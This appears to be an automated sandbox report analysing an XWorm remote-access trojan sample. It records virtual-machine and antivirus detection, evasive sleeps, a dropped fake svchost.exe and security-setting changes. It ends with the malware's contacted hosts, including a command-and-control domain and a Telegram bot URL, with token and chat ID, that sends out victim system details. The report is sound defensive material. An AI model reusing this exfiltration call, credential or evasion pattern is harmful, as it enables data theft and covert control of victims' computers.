Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Memory allocated: BA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Memory allocated: 1A8A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2940000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1A940000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 32A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1B2A0000 memory reserve | memory write watch Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Window / User API: threadDelayed 1599 Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Window / User API: threadDelayed 8237 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7496 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7508 Thread sleep count: 1599 > 30 Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe TID: 7508 Thread sleep count: 8237 > 30 Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7608 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7808 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe File Volume queried: unknown FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF681000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: yF21ypxRB7.exe, 00000000.00000002.3704179728.000000001B938000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Ad
Source: svchost.exe, 00000005.00000002.3700396624.000001EDEF602000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000005.00000002.3700982634.000001EDEF664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: svchost.exe, 00000005.00000002.3701142771.000001EDEF68E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.3700647003.000001EDEF62B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.3700765508.000001EDEF64D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000007.00000002.3700643698.000001FE6DA31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Memory allocated: page read and write | page guard Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Queries volume information: C:\Users\user\Desktop\yF21ypxRB7.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\yF21ypxRB7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE Jump to behavior
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 00000006.00000002.3701472363.0000011719502000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: yF21ypxRB7.exe, 00000000.00000002.3705285429.000000001C5E0000.00000004.00000020.00020000.00000000.sdmp, yF21ypxRB7.exe, 00000000.00000002.3704179728.000000001B9DE000.00000004.00000020.00020000.00000000.sdmp, yF21ypxRB7.exe, 00000000.00000002.3704179728.000000001B938000.00000004.00000020.00020000.00000000.sdmp, yF21ypxRB7.exe, 00000000.00000002.3700338414.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3701472363.0000011719502000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\yF21ypxRB7.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: yF21ypxRB7.exe, type: SAMPLE
Source: Yara match File source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: yF21ypxRB7.exe, type: SAMPLE
Source: Yara match File source: 0.0.yF21ypxRB7.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1245680814.0000000000472000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: yF21ypxRB7.exe PID: 6312, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557207 Sample: yF21ypxRB7.exe Startdate: 17/11/2024 Architecture: WINDOWS Score: 100 25 api.telegram.org 2->25 27 perfect-invest.gl.at.ply.gg 2->27 29 time.windows.com 2->29 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 43 15 other signatures 2->43 8 yF21ypxRB7.exe 15 6 2->8         started        13 svchost.exe 1 2->13         started        15 svchost.exe 2->15         started        17 5 other processes 2->17 signatures3 41 Uses the Telegram API (likely for C&C communication) 25->41 process4 dnsIp5 31 perfect-invest.gl.at.ply.gg 147.185.221.23, 49700, 49725, 49786 SALSGIVERUS United States 8->31 33 api.telegram.org 149.154.167.220, 443, 49699 TELEGRAMRU United Kingdom 8->33 23 C:\Users\user\AppData\Roaming\svchost.exe, PE32 8->23 dropped 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->45 47 Drops PE files with benign system names 8->47 49 Antivirus detection for dropped file 13->49 51 Multi AV Scanner detection for dropped file 13->51 53 Machine Learning detection for dropped file 13->53 55 Changes security center settings (notifications, updates, antivirus, firewall) 15->55 19 MpCmdRun.exe 2 15->19         started        file6 signatures7 process8 process9 21 conhost.exe 19->21         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
147.185.221.23
 perfect-invest.gl.at.ply.gg United States
12087 SALSGIVERUS true

Contacted Domains

Name IP Active
perfect-invest.gl.at.ply.gg 147.185.221.23 true
api.telegram.org 149.154.167.220 true
time.windows.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 false
    		high
    perfect-invest.gl.at.ply.gg true
    • Avira URL Cloud: malware
    		 unknown